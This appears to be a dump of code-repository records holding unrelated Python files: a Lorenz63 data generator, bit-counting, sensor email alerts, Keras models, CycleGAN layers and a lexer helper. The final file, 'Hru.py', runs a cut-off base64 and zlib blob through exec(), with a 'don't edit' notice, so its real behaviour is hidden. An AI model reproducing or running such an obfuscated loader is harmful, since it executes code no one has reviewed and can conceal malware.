np.save(os.path.join(self.data_dir, 'states_params.npy'), np.array(self.states_params_list))
np.save(os.path.join(self.data_dir, 'measures.npy'), np.array(self.measures_list))
def show_measures_from_Euler(self):
measures_clean_list = (np.array(self.states_clean_list)[:, 0]).reshape(-1) # without system error and measurement error
measures_system_error_list = (np.array(self.states_list)[:, 0]).reshape(-1) # with system error but no measurement error
measures_list = (np.array(self.measures_list)).reshape(-1)
colors = ['b', 'r', 'y']
for value, color in zip([measures_clean_list, measures_system_error_list, measures_list], colors):
plt.plot([i for i in range(self.epoch)], value, color)
plt.xlabel('step')
plt.ylabel('x (measurement)')
plt.title('measures of Lorenz63')
plt.legend(['without noise', 'with system noise', 'with system and measurement noise'])
# plt.show()
plt.savefig(os.path.join(self.figure_dir, 'measurement.jpg'))
def show_states_from_Euler(self):
names = ['states', 'states_clean']
for value, name in zip([np.array(self.states_list),np.array(self.states_clean_list)], names):
fig = plt.figure(figsize=(12, 6))
ax = fig.gca(projection='3d') # 获取当前子图,指定三维模式
ax.plot(value[:, 0], value[:, 1], value[:, 2], lw=1.0, color='b') # 画轨迹1
plt.title('{} of Lorenz system, $x_0$={},$y_0$={},$z_0$={}'.format(
name, self.initial_states[0], self.initial_states[1], self.initial_states[2]))
plt.xlabel('x')
plt.ylabel('y')
# plt.show()
plt.savefig(os.path.join(self.figure_dir, 'Lorenz63_{}_.jpg'.format(name)))
plt.close()
def show_observation_x(self):
names = ['states', 'states_clean']
colors = ['r', 'b']
for value, name, color in zip([np.array(self.states_list),np.array(self.states_clean_list)], names, colors):
plt.plot(value[:, 0], lw=1.0, color=color) # 画轨迹1
plt.title('{} of Lorenz system, $x_0$={},$y_0$={},$z_0$={}'.format(
name, self.initial_states[0], self.initial_states[1], self.initial_states[2]))
plt.xlabel('x')
plt.ylabel('y')
# plt.show()
plt.savefig(os.path.join(self.figure_dir, 'Lorenz63_x.jpg'))
plt.close()
def main():
config = Config()
initial_states = [1., 3., 5.]
stage = 'train'
if stage == 'train':
train_nums = 6000
for i in tqdm(range(train_nums)):
print('------------{}---------'.format(i))
config.initial_states = initial_states + np.random.random(3) * 0.1
generate_Lorenz63_data = Generate_Lorenz63_Data(config)
generate_Lorenz63_data.initial_config_and_dirs(i)
generate_Lorenz63_data.GT_noise_from_Euler()
elif stage == 'test':
# config.initial_states += np.random.random(3) * 4
generate_Lorenz63_data = Generate_Lorenz63_Data(config)
generate_Lorenz63_data.initial_config_and_dirs('test')
generate_Lorenz63_data.GT_from_odeint()
generate_Lorenz63_data.GT_from_Euler()
generate_Lorenz63_data.save_gt(method='Euler')
generate_Lorenz63_data.save_gt(method='odeint')
generate_Lorenz63_data.GT_noise_from_Euler()
generate_Lorenz63_data.show_measures_from_Euler()
generate_Lorenz63_data.show_states_from_Euler()
generate_Lorenz63_data.show_observation_x()
if __name__ == '__main__':
main()
| [
"xinjialimath@gmail.com"
] | xinjialimath@gmail.com |
02eda608de92ae0fed2702fed640218e15708220 | a0a04e207f4ba8d48f449f246c23f1db4f06f3a3 | /010-二进制中1的个数/v3/number_of_1.py | 397d6b1088847cb78700e6cfc178533ff9bfb400 | [
"Apache-2.0"
] | permissive | Jay54520/Learn-Algorithms-With-Python | e9a0fb70630368dea52d2b2307766a3190b0551d | 5fdd3a607ee3828e9b229cac8104fcccf1a2770d | refs/heads/master | 2021-06-06T15:55:34.297862 | 2020-02-03T13:06:48 | 2020-02-03T13:06:48 | 142,644,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,877 | py | # -*- coding: utf-8 -*-
import sys
MAXINT = 2 * (sys.maxint + 1)
class Solution:
"""
输入一个整数,输出该数二进制表示中1的个数。其中负数用补码表示。
算法3:
观察二进制的减法:
1100
-0001
------
1011
从右边开始,第一位 0 < 1,向前借一位;第二位为 0,借不出,于是向第三位借一位;第三位大于 0,所以可以结尾,
借了一位给第二位,于是第三位变成 1 - 1 = 0;
第二位借位后变成 10,然后借给第一位,变成了 10 - 1 = 1;第一位借位后变成 10,然后减去 1,变成了 1。
1100 & 1011 = 1000,所以假设 n & (n-1) 会使 n 的最后一个 1 变为 0。所以 n 有多少个 1
就能执行多少次这样的操作,直到变为 0 为止。
证明:如果 n 的最后一位是 1,那么 n - 1 的最后一位是 0,n & (n - 1) 使 n 的最后一个 1 变为 0 了;
如果 n 的第 m 位是 1,那么减一就要像上面那样一直借尾,使得第 m 位变为 0,m 位右边的所有位变为 1,
所以 n & (n-1) 还是会使 n 的最后一个 1 变为 0,因为 m 位和 m 位右边的每两个位中都有一个 0 存在,而位与
中只要有 0 存在那么结果就是 0。
参考原书。
"""
def NumberOf1(self, n):
number_of_1 = 0
if n < 0:
n = self.get_complement(abs(n))
while n:
number_of_1 += 1
n = n & (n - 1)
return number_of_1
def get_complement(self, num):
"""获取当前 Python 的下 num 的 2 的补数"""
if num < 0:
raise ValueError('num 不能小于 0')
# 32 位 Python 是 2 ** 32,64 位 Python 是 2 ** 64
# 参考 https://stackoverflow.com/a/7604981/5238892
return MAXINT - num
| [
"jsm0834@175game.com"
] | jsm0834@175game.com |
49a7d67eecf924882e9f2aa4097d4b1d2d124264 | ec46c70a721f16031a784f54f522656fb43dfc9f | /venv/lib/python3.6/stat.py | 4d858099ad6d6f85e6e7bf6703e84af7a7511e3c | [] | no_license | kardelen-karatas/django-importXML | c6a62942b740697d3647ec0bc1ed9c078e751159 | b169966627bd54b684aaedd5fd6c0d7be551b973 | refs/heads/master | 2022-12-10T00:38:40.578278 | 2020-04-15T10:34:36 | 2020-04-15T10:34:36 | 125,032,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 58 | py | /home/kardelen/.pyenv/versions/3.6.3/lib/python3.6/stat.py | [
"kardelen.karatas@gmail.com"
] | kardelen.karatas@gmail.com |
61ce54e0d88b1ecb2bae4d47502a4e78fbd91044 | 125be7674190db4a071e409c914e8f4c2f3b3c61 | /pyserial_test.py | 35e5b525b27d2dbb0655ddd7974c415f69b7de8f | [] | no_license | jcwebster/METR4810 | e25e7d5bf6b94430e0ce8afc9bcc05526c8ecbbf | 1e52b2691a559ad1f5849d9c4e62d2c3a3f359bc | refs/heads/master | 2021-04-02T17:14:50.761643 | 2018-05-25T02:28:14 | 2018-05-25T02:28:14 | 124,732,937 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | import time
import serial
import smtplib
TO = 'jebster15@gmail.com'
GMAIL_USER = 'jebster15@gmail.com'
GMAIL_PASS = 'putyourpasswordhere'
SUBJECT = 'Intrusion!!'
TEXT = 'Your PIR sensor detected movement'
ser = serial.Serial('COM3', 9600)
def send_email():
print("Sending Email")
smtpserver = smtplib.SMTP("smtp.gmail.com",587)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo
smtpserver.login(GMAIL_USER, GMAIL_PASS)
header = 'To:' + TO + '\n' + 'From: ' + GMAIL_USER
header = header + '\n' + 'Subject:' + SUBJECT + '\n'
print header
msg = header + '\n' + TEXT + ' \n\n'
smtpserver.sendmail(GMAIL_USER, TO, msg)
smtpserver.close()
while True:
message = ser.readline()
print(message)
if message[0] == 'M' :
#send_email()
print('sending email')
time.sleep(0.5)
| [
"jcwebster@uwaterloo.ca"
] | jcwebster@uwaterloo.ca |
938ee17a4f0f81f2ec099d3c9214514b49800d50 | c9bbb0a3bf44d1deb2025dec50b67d4beeb54e7a | /py3/lexerzoo/common_stuff.py | 6042914788d73c296477d3aa02d162043407cedf | [] | no_license | kykyev/lexers-zoo | 87d3d5ff1ac6c0e9bfd7d32b8f89539a62be6028 | da953232b9eb4986a4ee1e1dacc4377e2b0bb7c7 | refs/heads/master | 2020-06-04T04:20:40.912159 | 2015-05-21T15:03:23 | 2015-05-21T15:03:23 | 5,783,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,556 | py | """
"""
from collections import namedtuple
from queue import Queue
__all__ = [
'TOK_WORD', 'TOK_NUMBER', 'TOK_EOF',
'Token',
'MailBox',
'Buffer'
]
# token's types
TOK_WORD = 'TOK_WORD'
TOK_NUMBER = 'TOK_NUMBER'
TOK_EOF = 'TOK_EOF'
# type - token's type
# value - token's value
# meta - token's meta information
Token = namedtuple('Token', 'type value meta')
# lineno - line number
# start - token's start position in line
# end - token's end position
TokenMetaInfo = namedtuple('TokenMetaInfo', 'lineno start end')
# annotated symbol
# symbol - plain symbol
# lineno - line number
# column - column number
Asymbol = namedtuple('Asymbol', 'symbol lineno column')
class MailBox:
def __init__(self):
self.box = Queue()
def put(self, item):
self.box.put(item)
def get(self):
item = self.box.get()
if item == EOFError:
raise EOFError
return item
def __iter__(self):
for item in self.box:
if item == EOFError:
raise StopIteration
yield item
class Buffer:
def __init__(self):
self.asymbols = []
def push(self, s):
self.asymbols.append(s)
def reset(self):
self.asymbols = []
def token(self, type):
_asymbols = self.asymbols
value = "".join(s.symbol for s in _asymbols)
meta = TokenMetaInfo(_asymbols[0].lineno, _asymbols[0].column, _asymbols[-1].column)
return Token(type, value, meta)
def __iter__(self):
return iter(self.asymbols) | [
"me@eblan.(none)"
] | me@eblan.(none) |
4bd37797e18b615595f99c418a405cd55a3c50c1 | 088e3a9b6efa40d890529a70633663cae82fd20b | /layers.py | 77ec07ed618abad81ae71c1759a7c48c08e83d9c | [] | no_license | etuna/CycleGAN | 98b8d5afa5edc12aa463fa8bf73609babe593b81 | 0f790bb8ca478d7ebc07c1f481ca4bfc53a6882c | refs/heads/master | 2023-02-18T05:47:11.364130 | 2021-01-22T17:17:32 | 2021-01-22T17:17:32 | 330,125,563 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,137 | py | import tensorflow.compat.v1 as tf
import helper as H
helper = H.helper(tf)
def conv(input, reuse=False, name='conv'):
with tf.variable_scope(name, reuse=reuse):
weights = helper.genWeights("weights",shape=[7, 7, input.get_shape()[3], 3])
conv = tf.nn.conv2d(input, weights, strides=[1, 1, 1, 1], padding = 'SAME')
print('first conv '+str(conv.shape))
return tf.nn.tanh(helper.normalize(conv))
def genr(input, k, reuse=False, name=None):
with tf.variable_scope(name, reuse=reuse):
weights = helper.genWeights("weights",shape=[3, 3, input.get_shape()[3], k])
conv = tf.nn.conv2d(input, weights, strides=[1, 2, 2, 1], padding='SAME')
print('conv shape : {}'+ str(conv.shape))
return tf.nn.relu(helper.normalize(conv))
def addResBlocks(input, reuse):
output = res(input, input.get_shape()[3], reuse)
for i in range(1,10):
output = res(output, output.get_shape()[3], reuse)
return output
def res(input, n, reuse=False):
name = 'RESBLOCK{}{}'.format(input.get_shape()[3], 1)
with tf.variable_scope(name, reuse=reuse):
with tf.variable_scope('resLayer', reuse=reuse):
resWeights = helper.genWeights("resWeights", shape=[3, 3, input.get_shape()[3], n])
conv = tf.nn.conv2d(input, resWeights, strides=[1, 1, 1, 1], padding='SAME')
relued = tf.nn.relu(helper.normalize(conv))
with tf.variable_scope('resLayer2', reuse=reuse):
resWeights2 = helper.genWeights("resWeights2",shape=[3, 3, relued.get_shape()[3], n])
return input+helper.normalize(tf.nn.conv2d(relued, resWeights2, strides=[1, 1, 1, 1], padding='SAME'))
def frac(input, k, reuse=False, name=None):
with tf.variable_scope(name, reuse=reuse):
weights = helper.genWeights("weights", shape=[3, 3, k, input.get_shape().as_list()[3]])
outputShape = [input.get_shape().as_list()[0], input.get_shape().as_list()[1]*2, input.get_shape().as_list()[1]*2, k]
deConvConv = tf.nn.conv2d_transpose(input, weights, output_shape=outputShape, strides=[1, 2, 2, 1], padding='SAME')
print('deconv shape : {}'+ str(deConvConv.shape))
return tf.nn.relu(helper.normalize(deConvConv))
def disc(input, k, reuse=False, name=None):
with tf.variable_scope(name, reuse=reuse):
weights = helper.genWeights("weights", shape=[4, 4, input.get_shape()[3], k])
conv = tf.nn.conv2d(input, weights, strides=[1, 2, 2, 1], padding='SAME')
return helper.lRelu(helper.normalize(conv), 0.3)
def disc2(input, k, reuse=False, name=None):
with tf.variable_scope(name, reuse=reuse):
weights = helper.genWeights("weights", shape=[4, 4, input.get_shape()[3], k])
conv = tf.nn.conv2d(input, weights, strides=[1, 2, 2, 1], padding='SAME')
return tf.maximum(tf.contrib.layers.batch_norm(input, decay=0.9,scale=True,updates_collections=None,is_training=True), 0)
def decide(input, reuse=False, name=None):
with tf.variable_scope(name, reuse=reuse):
weights = helper.genWeights("weights", shape=[4, 4, input.get_shape()[3], 1])
conv = tf.nn.conv2d(input, weights, strides=[1, 1, 1, 1], padding='SAME')
biases = helper.genBiases("biases", [1])
return conv + biases | [
"etuna@ku.edu.tr"
] | etuna@ku.edu.tr |
e06edc9ef4206d01ba268cd77e82b51af3988588 | 00f3468d8917ac0c1b4df8b4dc50e82c0d9be3fa | /seqsfromfasta.py | f7aa0be287db92eee1959c13a03c700c3416c9e7 | [] | no_license | berkeleyphylogenomics/BPG_utilities | 4e332bb401b8c057502a1a0a1d532396bfff9542 | bbf5df137a0a459598c3f9073d80f0086e5f7550 | refs/heads/master | 2021-01-01T19:21:13.740575 | 2014-11-05T18:40:31 | 2014-11-05T18:40:31 | 24,867,074 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | #!/usr/bin/env python
from Bio import SeqIO
def seqpull(h, *args): #should use 'any' in py > 2.3
return ''.join([seq.format('fasta') for seq in SeqIO.parse(h,'fasta') \
if sum([seq.id.count(arg) for arg in args])])
if __name__ == '__main__':
import sys
if len(sys.argv) < 3:
print "%s: get sequences from a fasta file by substring in defline" \
% sys.argv[0]
print "USAGE: %s <multiple fasta file> [keywords]" % sys.argv[0]
else:
h = open(sys.argv[1])
print seqpull(h,*sys.argv[2:])
h.close()
| [
"afrasiabi@berkeley.edu"
] | afrasiabi@berkeley.edu |
67b8404369a54607817541ec5f3cf111a34e010f | 79ca85694d6e51c1523c019cf93df7910d1bd096 | /src/study_keras/1_hello_mnist/hello_mnist_fashion_1.py | 96a6e62b550a56ddbcd4efd1c12d7597e14c8c79 | [
"MIT"
] | permissive | iascchen/ai_study_notes | 396ed19b140befc9753e442235dedaa4559f0d8b | 03f46c5e37670c10bd99000d979940db8878f36c | refs/heads/master | 2022-08-21T18:25:33.865912 | 2020-06-26T14:22:19 | 2020-06-26T14:22:19 | 200,769,105 | 4 | 1 | MIT | 2022-07-06T20:12:41 | 2019-08-06T03:25:17 | Python | UTF-8 | Python | false | false | 1,300 | py | from tensorflow.keras import datasets, models
from image_utils import visualize_layer_filters
if __name__ == '__main__':
mnist = datasets.fashion_mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
img_rows, img_cols = 28, 28
train_images = x_train.reshape(x_train.shape[0], 28, 28, 1)
test_images = x_test.reshape(x_test.shape[0], 28, 28, 1)
x_train, x_test = x_train / 255.0, x_test / 255.0
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag',
'Ankle boot']
#######################
# load model
#######################
base_path = "../../../output"
h5_path = "%s/hello_mnist_fashion.h5" % base_path
loaded_model = models.load_model(h5_path)
loaded_model.summary()
# loaded_model.evaluate(test_images, y_test)
#######################
# draw Convolutional Filter
#######################
# TODO: Error. Fused conv implementation does not support grouped convolutions for now.
convLayers = [layer.name for layer in loaded_model.layers if (layer.__class__.__name__ == 'Conv2D')]
print(convLayers)
for i in range(len(convLayers)):
visualize_layer_filters(model=loaded_model, layer_name=convLayers[i], epochs=40)
| [
"chenhao@microduino.cc"
] | chenhao@microduino.cc |
81b262225ee0e402d629bfa32004c14047740aab | a69da8a9caf3472758ef4ea001067e59790eddea | /env/Scripts/django-admin.py | 51c8cd8fac51aefb3ba0338e2542416b53d0a5b8 | [] | no_license | KartikTakyar0046/AskMeAnything.com | 9f55596254c26a580f2a64e389d69c6feefa4f8f | 16913330569f9787ff396421d5668a47f003efe7 | refs/heads/master | 2023-07-18T21:33:56.362574 | 2021-09-21T05:31:16 | 2021-09-21T05:31:16 | 329,034,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 704 | py | #!c:\users\kartik\desktop\p1\askmeanything.com\env\scripts\python.exe
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"42770126+KartikTakyar0046@users.noreply.github.com"
] | 42770126+KartikTakyar0046@users.noreply.github.com |
c7d586ce958c80402104036345d4636701b137d2 | 5ad6e58f6f7047e7ad1bd177e69faf6aece3f3ef | /ai/population.py | 44360e5d5d8f365bba66d5fada656a9412143750 | [] | no_license | VictorShow/stock | dfb07509c55c642a83b4d95706fd62294fd30268 | 10d09d896256a8fb20d64b8a218d7cf96634b675 | refs/heads/master | 2021-04-10T11:18:11.783189 | 2020-03-21T08:02:03 | 2020-03-21T08:02:03 | 248,931,648 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,527 | py | from ai.util import Storage
from tensorflow import keras, random
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
class Popluation:
population_inc : []
population_old : []
@property
def population_inc(self) -> object: return self._population_inc
@population_inc.setter
def population_inc(self, population_inc): self._population_inc = population_inc
@property
def population_old(self) -> object: return self._population_old
@population_inc.setter
def population_old(self, population_old): self._population_old = population_old
def __init__(self):
self.storage = Storage()
def initialize(self):
self.population_inc = [0.3, -0.78, 1.26, 0.03, 1.11, 15.17, 0.24, -0.24, -0.47, -0.77, -0.37, -0.85, -0.41, -0.27,
0.02, -0.76, 2.66]
self.population_old = [12.27, 14.44, 11.87, 18.75, 17.52, 9.29, 16.37, 19.78, 19.51, 12.65, 14.74, 10.72, 21.94,
12.83, 15.51, 17.14, 14.42]
def population_without_outlier(self):
self.population_inc = self.population_inc[:5] + self.population_inc[6:]
self.population_old = self.population_old[:5] + self.population_old[6:]
def population_with_regression(self):
# 최소제곱법 으로 회귀선 구하기
# 4.3 최소제곱법으로 회귀선 구하기
X = self.population_inc
Y = self.population_old
# X, Y의 평균
x_bar = sum(X) / len(X)
y_bar = sum(Y) / len(Y)
# 최소제곱법으로 a, b를 구합니다.
a = sum([(y - y_bar) * (x - x_bar) for y, x in list(zip(Y, X))])
a /= sum([(x - x_bar) ** 2 for x in X])
b = y_bar - a * x_bar
print('a:', a, 'b:', b)
# 그래프를 그리기 위해 회귀선의 x, y 데이터를 구합니다.
line_x = np.arange(min(X), max(X), 0.01)
line_y = a * line_x + b
return {'line_x': line_x, 'line_y': line_y}
def population_with_regression_using_tf(self):
# tf를 사용해서 회귀선 구하기.
X = instance.population_inc
Y = instance.population_old
a = tf.Variable(random.random())
b = tf.Variable(random.random())
# 잔차의 제곱의 평균을 반환하는 함수
def compute_loss():
y_pred = a * X + b
loss = tf.reduce_mean(Y - y_pred) ** 2 #최소제곱법
return loss
optimizer = tf.keras.optimizers.Adam(lr=0.07)
for i in range(1000):
optimizer.minimize(compute_loss, var_list=[a, b])
if i % 100 == 99:
print(i, 'a:', a.numpy(), 'b:', b.numpy(), 'loss:', compute_loss().numpy())
line_x = np.arange(min(X), max(X), 0.01)
line_y = a * line_x + b
return {'line_x': line_x, 'line_y': line_y}
def normalization(self):
pass
def new_model(self):
X = instance.population_inc
Y = instance.population_old
model = tf.keras.Sequential([
tf.keras.layers.Dense(units=6, activation='tanh', input_shape=(1,)), # 입력값
tf.keras.layers.Dense(units=1) # 결과값
])
model.compile(optimizer=tf.keras.optimizers.SGD(lr=0.1), loss='mse')
# mse : mean squared error
model.fit(X, Y, epochs=10)
model.predict(X)
return model
def predict(self, model):
X = self.population_inc
line_x = np.arange(min(X), max(X), 0.01)
line_y = model.predict(line_x)
return {'line_x': line_x, 'line_y': line_y}
class View:
@staticmethod
def show_population(instance, dic):
X = instance.population_inc
Y = instance.population_old
line_x = dic['line_x']
line_y = dic['line_y']
# 붉은색 실선으로 회귀선을 그립니다.
plt.plot(line_x, line_y, 'r-')
plt.plot(X, Y, 'bo')
plt.xlabel('Population Growth Rate (%)')
plt.ylabel('Elderly Population Rate (%)')
plt.show()
if __name__ == '__main__':
instance = Popluation()
view = View()
instance.initialize()
instance.population_without_outlier()
#dic = instance.population_with_regression()
#dic = instance.population_with_regression_using_tf()
#model = instance.new_model() # 모델로 변경하는 부분을 보여 주기 위해서
dic = instance.predict(instance.new_model())
view.show_population(instance, dic) | [
"kjhk26@gmail.com"
] | kjhk26@gmail.com |
599a63942744bedf485f445f7836915eb939788a | f44e4c541308a5a7d6fce91faa626d9947981a4e | /src/AnemoClinoIHM/AnalyserUsefulClasses/ObjectEventService.py | 1db3c3b05b4ecfff0be56b536aa005258b9c98dd | [] | no_license | ChicLi/anemo | 8258140b021e62596879237c0c2807289e78851e | 5a527ef6dddeb1e733a1c0f87e9c544a5eba8a6e | refs/heads/master | 2020-07-14T11:05:10.030977 | 2016-09-28T02:33:49 | 2016-09-28T02:33:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 999 | py | """
Last updated on 07/01/2015
@author: Cheng WANG,
"""
from PyQt4.QtCore import *
class ObjectEventService(QObject):
def __init__(self, parent):
QObject.__init__(self, parent)
parent.setMouseTracking(True)
parent.installEventFilter(self)
def eventFilter(self, _, event):
if event.type() == QEvent.MouseMove:
self.emit(SIGNAL("MouseMove"), event.pos())
elif event.type() == QEvent.MouseButtonPress:
self.emit(SIGNAL("MouseClicked"), event.pos())
elif event.type() == QEvent.MouseButtonRelease:
self.emit(SIGNAL("MouseReleased"), event.pos())
elif event.type() == QEvent.MouseButtonDblClick:
self.emit(SIGNAL("MouseDoubleClick"), event.pos())
elif event.type() == QEvent.HoverEnter:
self.emit(SIGNAL("MouseHovered"), event.pos())
elif event.type() == QEvent.Leave:
self.emit(SIGNAL("MouseLeaved"))
return False
# eventFilter() | [
"Cheng WANG"
] | Cheng WANG |
ca6fe37978296238fb90e6d193ad9e7a739cfb54 | 804bd568724431ce740aac9994747a0a9a5e3f93 | /Hru.py | 8ef4e43cf4a7e5a2cef52bf887e356aee0f03896 | [] | no_license | SOMii-BRAND/hru | 9a9f1bd054b19cff2eb7f7ae6001352afa9816e0 | cb89fa5233d58a4f53c19c43825535d66617b673 | refs/heads/main | 2022-12-30T06:17:31.280845 | 2020-10-26T11:43:51 | 2020-10-26T11:43:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,063 | py | #Encrypted By SOMI BRAND
#WHATSAPP : +923455453538/DON,T TRY TO EDIT THIS TOOL/
import zlib, base64
exec(zlib.decompress(base64.b64decode("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